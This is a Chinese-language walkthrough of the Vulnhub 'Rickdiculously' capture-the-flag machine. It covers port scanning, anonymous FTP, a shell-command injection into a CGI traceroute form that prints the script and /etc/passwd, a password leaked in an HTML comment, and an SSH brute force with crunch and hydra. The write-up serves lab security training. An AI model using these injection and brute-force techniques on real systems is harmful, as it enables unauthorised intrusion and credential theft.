Rickdiculously
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.60.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:0d:0d:44 1 60 PCS Systemtechnik GmbH
192.168.56.106 08:00:27:bf:52:95 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.106
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.106 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-06 06:09 EST
Nmap scan report for bogon (192.168.56.106)
Host is up (0.00014s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 42 Aug 22 2017 FLAG.txt
|_drwxr-xr-x 2 0 0 6 Feb 12 2017 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.206
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh?
| fingerprint-strings:
| NULL:
|_ Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp open http Apache httpd 2.4.27 ((Fedora))
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
| http-methods:
|_ Potentially risky methods: TRACE
9090/tcp open http Cockpit web service 161 or earlier
| http-title: localhost.localdomain
|_Requested resource was https://bogon:9090/
13337/tcp open unknown
| fingerprint-strings:
| NULL:
|_ FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open ssh OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
| 256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
|_ 256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (ED25519)
60000/tcp open unknown
| fingerprint-strings:
| NULL, ibm-db2:
|_ Welcome to Ricks half baked reverse shell...
|_drda-info: ERROR
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.92%I=7%D=12/6%Time=638F22EA%P=x86_64-pc-linux-gnu%r(NULL
SF:,42,"Welcome\x20to\x20Ubuntu\x2014\.04\.5\x20LTS\x20\(GNU/Linux\x204\.4
SF:\.0-31-generic\x20x86_64\)\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port13337-TCP:V=7.92%I=7%D=12/6%Time=638F22EA%P=x86_64-pc-linux-gnu%r(N
SF:ULL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port60000-TCP:V=7.92%I=7%D=12/6%Time=638F22F0%P=x86_64-pc-linux-gnu%r(N
SF:ULL,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\.
SF:\.\n#\x20")%r(ibm-db2,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20re
SF:verse\x20shell\.\.\.\n#\x20");
MAC Address: 08:00:27:BF:52:95 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.98 seconds
NMAP扫描结果发现了几个Flag:
FLAG:{TheyFoundMyBackDoorMorty}-10Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
获得Shell
先来看FTP服务:
┌──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ ftp 192.168.56.106
Connected to 192.168.56.106.
220 (vsFTPd 3.0.3)
Name (192.168.56.106:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||57192|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 42 Aug 22 2017 FLAG.txt
drwxr-xr-x 2 0 0 6 Feb 12 2017 pub
226 Directory send OK.
ftp> get FLAG.txt
local: FLAG.txt remote: FLAG.txt
229 Entering Extended Passive Mode (|||62512|)
150 Opening BINARY mode data connection for FLAG.txt (42 bytes).
100% |********************************************************************************| 42 60.13 KiB/s 00:00 ETA
226 Transfer complete.
42 bytes received in 00:00 (27.12 KiB/s)
ftp> cd pub
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||29841|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 6 Feb 12 2017 .
drwxr-xr-x 3 0 0 33 Aug 22 2017 ..
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ cat FLAG.txt
FLAG{Whoa this is unexpected} - 10 Points
FTP允许匿名服务,并有一个FLAG,将其下载到Kali Linux本地。
再来看80端口:
┌──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ curl http://192.168.56.106/robots.txt
They're Robots Morty! It's ok to shoot them! They're just Robots!
/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
/cgi-bin/*
访问上述2个文件:
┌──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ curl http://192.168.56.106/cgi-bin/root_shell.cgi
<html><head><title>Root Shell
</title></head>
--UNDER CONSTRUCTION--
<!--HAAHAHAHAAHHAaAAAGGAgaagAGAGAGG-->
<!--I'm sorry Morty. It's a bummer.-->
</html>
┌──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ curl http://192.168.56.106/cgi-bin/tracertool.cgi
<html><head><title>Super Cool Webpage
</title></head>
<b>MORTY'S MACHINE TRACER MACHINE</b>
<br>Enter an IP address to trace.</br>
<form action=/cgi-bin/tracertool.cgi
method="GET">
<textarea name="ip" cols=40 rows=4>
</textarea>
<input type="submit" value="Trace!">
</form>
其中tracertool.cgi执行命令trace,因此看一下是否有命令注入漏洞:
发现cat命令被过滤掉了,但是More命令可以使用
在输入框构造: ;more tracertool.cgi:
返回:
:::::::::::::
tracertool.cgi
::::::::::::::
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo ""
echo "MORTY'S MACHINE TRACER MACHINE"
echo "
Enter an IP address to trace.
"
echo "
"
echo ""
echo ""
echo ""
echo "
"
OIFS="$IFS"
IFS="${IFS}&"
set $QUERY_STRING > /dev/null
args="$*"
IFS="$OIFS"
IP=""
if [ -z "$QUERY_STRING" ]; then
exit 0
fi
IP=`echo "$QUERY_STRING" | sed -n 's/^.*ip=\([^&]*\).*$/\1/p' | sed "s/%3B/;/g" | sed "s/%20/ /g" | sed "s/%2F/\//g" | sed "s/\+/ /g" | sed "s/%3C/\/g"`
echo "
"
eval "traceroute $IP"
echo "
"
echo ""
exit 0
::::::::::::::
/etc/passwd
::::::::::::::
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-coredump:x:999:998:systemd Core Dumper:/:/sbin/nologin
systemd-timesync:x:998:997:systemd Time Synchronization:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:997:996:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
cockpit-ws:x:996:994:User for cockpit-ws:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
chrony:x:995:993::/var/lib/chrony:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
知道用户有:
Morty, Summer
接下来对80端口做一下目录扫描:
┌──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ nikto -h http://192.168.56.106
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.106
+ Target Hostname: 192.168.56.106
+ Target Port: 80
+ Start Time: 2022-12-06 06:25:50 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.27 (Fedora)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.27 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /passwords/: Directory indexing found.
+ OSVDB-3092: /passwords/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8724 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2022-12-06 06:26:42 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nikto工具发现了/passwords目录,访问该目录:
该目录一下又有个FLAG文件:FLAG{Yeah d- just don't do it.} - 10 Points
以及链接:
┌──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ curl http://192.168.56.106/passwords/passwords.html
<!DOCTYPE html>
<html>
<head>
<title>Morty's Website</title>
<body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.</body>
<!--Password: winter-->
</head>
</html>
passwords.html返回页面源代码中的注释有个密码信息,试一下这个密码是哪个用户的?
──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ ssh [email protected] -p 22222
The authenticity of host '[192.168.56.106]:22222 ([192.168.56.106]:22222)' can't be established.
ED25519 key fingerprint is SHA256:RD+qmhxymhbL8Ul9bgsqlDNHrMGfOZAR77D3nqLNwTA.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.106]:22222' (ED25519) to the list of known hosts.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
┌──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ ssh [email protected] -p 22222
[email protected]'s password:
Last login: Thu Oct 6 00:54:37 2022 from 192.168.56.101
[Summer@localhost ~]$ id
uid=1002(Summer) gid=1002(Summer) groups=1002(Summer) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[Summer@localhost ~]$
经过尝试,发现winter是用户Summer的密码。
[Summer@localhost var]$ cd /home
[Summer@localhost home]$ ls -alh
total 0
drwxr-xr-x. 5 root root 52 Aug 18 2017 .
dr-xr-xr-x. 17 root root 236 Aug 18 2017 ..
drwxr-xr-x. 2 Morty Morty 131 Sep 15 2017 Morty
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 2017 RickSanchez
drwx------. 3 Summer Summer 111 Oct 6 01:00 Summer
[Summer@localhost home]$
[Summer@localhost home]$ sudo -l
[sudo] password for Summer:
Sorry, user Summer may not run sudo on localhost.
[Summer@localhost home]$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/passwd
/usr/bin/su
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/mount
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/at
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/crontab
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/sbin/userhelper
/usr/sbin/mount.nfs
/usr/sbin/mtr
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/libexec/cockpit-session
/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
[Summer@localhost home]$
[Summer@localhost ~]$ more FLAG.txt
FLAG{Get off the high road Summer!} - 10 Points
Cat命令仍然不能用,可以用more
没有提权的地方。
继续看其他端口:
[Summer@localhost home]$ cd Morty/
[Summer@localhost Morty]$ ls -alh
total 64K
drwxr-xr-x. 2 Morty Morty 131 Sep 15 2017 .
drwxr-xr-x. 5 root root 52 Aug 18 2017 ..
-rw-------. 1 Morty Morty 1 Sep 15 2017 .bash_history
-rw-r--r--. 1 Morty Morty 18 May 30 2017 .bash_logout
-rw-r--r--. 1 Morty Morty 193 May 30 2017 .bash_profile
-rw-r--r--. 1 Morty Morty 231 May 30 2017 .bashrc
-rw-r--r--. 1 root root 414 Aug 22 2017 journal.txt.zip
-rw-r--r--. 1 root root 43K Aug 22 2017 Safe_Password.jpg
将journal.txt.zip以及Safe_Password.jpg文件下载到Kali Linux本地(可以在目标主机利用Python启用web)
/usr/bin/python3
[Summer@localhost Morty]$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.206 - - [06/Dec/2022 22:42:16] "GET /journal.txt.zip HTTP/1.1" 200 -
192.168.56.206 - - [06/Dec/2022 22:42:28] "GET /Safe_Password.jpg HTTP/1.1" 200 -
┌──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ wget http://192.168.56.106:8000/journal.txt.zip
--2022-12-06 06:42:17-- http://192.168.56.106:8000/journal.txt.zip
Connecting to 192.168.56.106:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 414 [application/zip]
Saving to: ‘journal.txt.zip’
journal.txt.zip 100%[=====================================================>] 414 --.-KB/s in 0s
2022-12-06 06:42:17 (141 MB/s) - ‘journal.txt.zip’ saved [414/414]
┌──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ wget http://192.168.56.106:8000/Safe_Password.jpg
--2022-12-06 06:42:30-- http://192.168.56.106:8000/Safe_Password.jpg
Connecting to 192.168.56.106:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 43145 (42K) [image/jpeg]
Saving to: ‘Safe_Password.jpg’
Safe_Password.jpg 100%[=====================================================>] 42.13K --.-KB/s in 0.001s
2022-12-06 06:42:30 (46.4 MB/s) - ‘Safe_Password.jpg’ saved [43145/43145]
┌──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ ls
FLAG.txt FLAG.txt.1 journal.txt.zip nmap_full_scan Safe_Password.jpg shell.php
┌──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ strings Safe_Password.jpg
JFIF
Exif
8 The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek
8BIM
8BIM
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
#3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
0D000D\DDDD\t\\\\\t
用strings得到的密码打开journal.txt.zip
┌──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ unzip journal.txt.zip
Archive: journal.txt.zip
[journal.txt.zip] journal.txt password:
inflating: journal.txt
┌──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ ls
FLAG.txt FLAG.txt.1 journal_hash journal.txt journal.txt.zip nmap_full_scan Safe_Password.jpg shell.php
┌──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ cat journal.txt
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe?
Anyway. Here it is:
FLAG: {131333} - 20 Points
[Summer@localhost ~]$ ./safe
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
[Summer@localhost ~]$
[Summer@localhost ~]$ ./safe 131333
decrypt: FLAG{And Awwwaaaaayyyy we Go!} - 20 Points
Ricks password hints:
(This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order
1 uppercase character
1 digit
One of the words in my old bands name.� @
[Summer@localhost ~]$
┌──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ crunch 7 7 -t ,%Flesh > rick.txt;crunch 10 10 -t ,%Curtains >> rick.txt
Crunch will now generate the following amount of data: 2080 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
Crunch will now generate the following amount of data: 2860 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
┌──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ ls
FLAG.txt FLAG.txt.1 journal_hash journal.txt journal.txt.zip nmap_full_scan rick.txt Safe_Password.jpg shell.php
┌──(kali㉿kali)-[~/Vulnhub/Rickdiculously]
└─$ hydra -l RickSanchez -P "rick.txt" ssh://192.168.56.106:22222
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-06 06:52:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 520 login tries (l:1/p:520), ~33 tries per task
[DATA] attacking ssh://192.168.56.106:22222/
[STATUS] 156.00 tries/min, 156 tries in 00:01h, 366 to do in 00:03h, 14 active
[STATUS] 122.00 tries/min, 366 tries in 00:03h, 156 to do in 00:02h, 14 active
[22222][ssh] host: 192.168.56.106 login: RickSanchez password: P7Curtains
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-06 06:56:30
发昂问9090端口,返回页面中又有一个FLAG:FLAG {There is no Zeus, in your face!} - 10 Points
标签:bin,Summer,sbin,kali,192.168,Rickdiculously,Vulnhub,靶机,txt From: https://www.cnblogs.com/jason-huawen/p/16960379.html